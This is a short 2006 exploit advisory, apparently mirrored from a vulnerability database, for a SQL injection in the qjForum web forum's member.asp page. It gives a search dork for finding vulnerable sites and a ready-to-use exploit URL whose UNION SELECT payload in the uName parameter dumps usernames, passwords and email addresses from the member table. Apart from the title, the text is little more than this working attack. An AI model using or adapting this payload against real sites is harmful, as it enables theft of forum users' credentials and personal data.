Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12843
HistoryMay 27, 2006 - 12:00 a.m.

qjForum(member.asp) SQL Injection Vulnerability

2006-05-2700:00:00
vulners.com
14

Pls qjForum to Register and Log İn

Title : qjForum(member.asp) SQL Injection Vulnerability

Author : ajann

Dork : "qjForum"

Exploit;

SQL--------------------------------------------------------

http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

ajann,Turkey